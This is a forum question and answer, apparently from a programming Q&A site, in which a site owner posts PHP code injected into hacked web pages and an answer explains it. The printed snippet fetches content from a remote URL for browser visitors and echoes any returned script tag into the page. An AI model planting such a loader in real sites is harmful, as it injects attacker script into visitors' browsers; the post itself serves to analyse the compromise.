Search code examples

Unauthorised code placed on web pages

Recently a website I have been involved with was hacked with unauthorised code being placed on a number of pages. I was just wondering if anyone could shed any light onto what exactly this code does, and what benefit it would be to the user who placed it on these pages.

error_reporting(0); ini_set('display_errors',0); $wp_okpbo35639 = @$_SERVER['HTTP_USER_AGENT'];
if (( preg_match ('/Gecko|MSIE/i', $wp_okpbo35639) && !preg_match ('/bot/i', $wp_okpbo35639))){
$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_okpbo0935639);
curl_setopt ($ch, CURLOPT_TIMEOUT, 6); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $wp_35639okpbo =   curl_exec ($ch); curl_close($ch);}
if ( substr($wp_35639okpbo,1,3) === 'scr' ){ echo $wp_35639okpbo; }

Above is the code, as it appeared on the pages. I have played around with this code and it seems to get user information using:


It is then combined into a url similar to the one below, but with the user information from above added to the url

I know curl is used in the transfer of data but where exactly is this information getting sent and what is its purpose?


  • The code makes a call to the URL you noted, sending along the user's IP, your site's domain, and the user's useragent string. It's then printing onto your site any code it receives from the cURL request. The code received could be anything. It could be HTML, JavaScript, or any other client side code. It's probably not server-side code since there's no eval() running the code received.

    It appears to target Internet Explorer, Chrome, and FireFox browsers, but not crawlers/bots.

    EDIT: As FDL pointed out in his comment, this appears to be printing only if it receives a string where the second, third, and fourth characters are scr, meaning it likely only prints to the page if it received a <script> tag.